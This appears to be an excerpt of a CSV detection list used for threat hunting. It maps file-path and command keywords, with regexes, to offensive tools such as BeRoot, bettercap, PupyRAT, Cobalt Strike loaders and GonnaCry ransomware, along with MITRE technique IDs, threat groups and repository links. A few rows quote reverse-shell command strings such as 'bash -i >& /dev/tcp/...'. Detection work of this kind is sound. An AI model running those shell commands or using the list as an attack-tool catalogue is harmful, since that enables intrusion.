"*/beRoot.zip*",".{0,1000}\/beRoot\.zip.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","5603"
"*/BeRoot/Linux/*",".{0,1000}\/BeRoot\/Linux\/.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","5604"
"*/beroot/modules/*.py*",".{0,1000}\/beroot\/modules\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","5605"
"*/BesoToken.cpp*",".{0,1000}\/BesoToken\.cpp.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","5606"
"*/BesoToken.exe*",".{0,1000}\/BesoToken\.exe.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","5607"
"*/BesoToken.git*",".{0,1000}\/BesoToken\.git.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","5608"
"*/bettercap*",".{0,1000}\/bettercap.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","5609"
"*/BetterSafetyKatz.exe*",".{0,1000}\/BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","5610"
"*/BetterSafetyKatz.exe*",".{0,1000}\/BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","5611"
"*/bgp_exfil.py*",".{0,1000}\/bgp_exfil\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","5612"
"*/bh_owned.py*",".{0,1000}\/bh_owned\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","5613"
"*/BHF Rat v * beta.exe*",".{0,1000}\/BHF\sRat\sv\s.{0,1000}\sbeta\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5614"
"*/bhqc.py -*",".{0,1000}\/bhqc\.py\s\-.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","0","N/A","AD Enumeration","6","3","239","26","2025-04-04T05:11:46Z","2021-02-16T16:04:16Z","5615"
"*/BIFFRecordEncryption.cs*",".{0,1000}\/BIFFRecordEncryption\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","5616"
"*/Bifrost RAT Of Evil.exe*",".{0,1000}\/Bifrost\sRAT\sOf\sEvil\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5617"
"*/big_shell_pwd.7z*",".{0,1000}\/big_shell_pwd\.7z.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","5618"
"*/bin/0d1n*",".{0,1000}\/bin\/0d1n.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","#linux","N/A","7","","N/A","","","","5619"
"*/bin/AceLdr*",".{0,1000}\/bin\/AceLdr.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/AceLdr","1","1","#linux","N/A","10","10","925","164","2024-06-04T16:45:42Z","2022-08-11T00:06:09Z","5620"
"*/bin/bash -c ""php -q -S 0.0.0.0:80 &"" > /dev/null 2>&1*",".{0,1000}\/bin\/bash\s\-c\s\""php\s\-q\s\-S\s0\.0\.0\.0\:80\s\&\""\s\>\s\/dev\/null\s2\>\&1.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","5621"
"*/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'*",".{0,1000}\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","#linux","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","5622"
"*/bin/fake-sms*",".{0,1000}\/bin\/fake\-sms.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","#linux","N/A","8","10","2745","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z","5627"
"*/bin/gonnacry*",".{0,1000}\/bin\/gonnacry.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","5628"
"*/bin/gorsair *",".{0,1000}\/bin\/gorsair\s.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tool","https://github.com/Ullaakut/Gorsair","1","0","#linux","N/A","N/A","9","851","70","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z","5629"
"*/bin/gs-netcat*",".{0,1000}\/bin\/gs\-netcat.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","5630"
"*/bin/gs-netcat*",".{0,1000}\/bin\/gs\-netcat.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","5631"
"*/bin/hakrawler*",".{0,1000}\/bin\/hakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","0","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","5632"
"*/bin/htran*",".{0,1000}\/bin\/htran.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#linux","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","5633"
"*/bin/kidlogger*",".{0,1000}\/bin\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","5634"
"*/bin/nxcdb*",".{0,1000}\/bin\/nxcdb.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","5637"
"*/bin/posh*",".{0,1000}\/bin\/posh.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","#linux","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","5639"
"*/bin/processhider*",".{0,1000}\/bin\/processhider.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","5640"
"*/bin/proxy_cli.py*",".{0,1000}\/bin\/proxy_cli\.py.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","1","#linux","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","5641"
"*/bin/pspsy*",".{0,1000}\/bin\/pspsy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","5642"
"*/bin/pupysh*",".{0,1000}\/bin\/pupysh.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","#linux","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","5643"
"*/bin/read_i.php?a1=step2-down-b&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-b\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","5644"
"*/bin/read_i.php?a1=step2-down-c&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-c\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","5645"
"*/bin/read_i.php?a1=step2-down-j&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-j\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","5646"
"*/bin/read_i.php?a1=step2-down-k&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-k\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","5647"
"*/bin/read_i.php?a1=step2-down-r&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-r\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","5648"
"*/bin/read_i.php?a1=step2-down-u&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-u\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","5649"
"*/bin/rotateproxy*",".{0,1000}\/bin\/rotateproxy.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#linux","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","5650"
"*/bin/sh -i <&3 >&3 2>&3*",".{0,1000}\/bin\/sh\s\-i\s\<\&3\s\>\&3\s2\>\&3.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","#linux","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","5653"
"*/bin/Sleeper.o*",".{0,1000}\/bin\/Sleeper\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","1","#linux","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","5655"
"*/bin/tor2web*",".{0,1000}\/bin\/tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","5658"
"*/bin/torify*",".{0,1000}\/bin\/torify.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A","5659"
"*/bin/tshd*",".{0,1000}\/bin\/tshd.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#linux","N/A","10","6","568","130","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z","5660"
"*/bin/unshackle*",".{0,1000}\/bin\/unshackle.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","#linux","N/A","10","10","1899","125","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z","5663"
"*/bin/wapiti*",".{0,1000}\/bin\/wapiti.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","#linux","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","5664"
"*/bin2hex.lua*",".{0,1000}\/bin2hex\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","5667"
"*/bind_powershell.rb*",".{0,1000}\/bind_powershell\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","5668"
"*/bindshell.lua*",".{0,1000}\/bindshell\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","5669"
"*/bin-sploits/*.zip*",".{0,1000}\/bin\-sploits\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","5670"
"*/BITB.git*",".{0,1000}\/BITB\.git.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","N/A","10","10","2823","474","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z","5671"
"*/BITB-main*",".{0,1000}\/BITB\-main.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","N/A","10","10","2823","474","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z","5672"
